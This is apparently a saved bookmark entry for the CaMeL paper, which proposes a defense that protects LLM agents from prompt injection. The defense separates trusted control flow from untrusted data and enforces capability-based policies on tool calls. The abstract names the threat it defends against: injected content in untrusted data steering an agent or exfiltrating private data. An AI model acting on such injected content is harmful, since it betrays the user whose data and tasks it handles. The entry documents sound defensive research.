[2503.18813] Defeating Prompt Injections by Design (CaMeL)

Created 11/26/2025 at 3:18:11 PM • Edited 2/27/2026 at 10:18:15 PM

LLM agents are vulnerable to prompt injection attacks when handling untrusted data. In this paper we propose CaMeL, a robust defense that creates a protective system layer around the LLM, securing it even when underlying models are susceptible to attacks. To operate, CaMeL explicitly extracts the control and data flows from the (trusted) query; therefore, the untrusted data retrieved by the LLM can never impact the program flow. To further improve security, CaMeL uses a notion of a capability to prevent the exfiltration of private data over unauthorized data flows by enforcing security policies when tools are called.

ai prompt-injection security llm

Public